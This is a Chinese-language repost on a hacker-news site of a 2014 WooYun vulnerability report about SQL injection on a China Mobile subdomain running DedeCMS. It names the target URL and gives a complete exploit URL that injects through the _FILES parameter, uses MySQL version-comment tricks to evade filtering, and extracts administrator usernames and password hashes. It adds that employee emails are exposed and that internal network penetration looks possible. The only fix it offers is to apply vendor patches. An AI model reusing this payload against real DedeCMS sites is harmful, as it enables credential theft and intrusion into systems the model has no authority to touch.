记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国移动分站SQL注入可getshell

2014-05-16 00:35

出现SQL注入漏洞的网站:http://net.chinamobile.com/netmeeting/index.html



exp-demo:

http://net.chinamobile.com/netmeeting/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878

漏洞证明:

直接爆出管理员账户信息

1.jpg





注册会员全部是移动员工,查库可查大量员工邮箱,该业务是短信验证码登陆,所以不存在密码泄露。不过会泄露内部人员邮箱信息。

2.jpg





3.jpg





目测可内网渗透,不过并未测试。

4.jpg

修复方案:

关注织梦官方公告及最新补丁。

知识来源: www.wooyun.org/bugs/wooyun-2014-055148

阅读:81366 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国移动分站SQL注入可getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词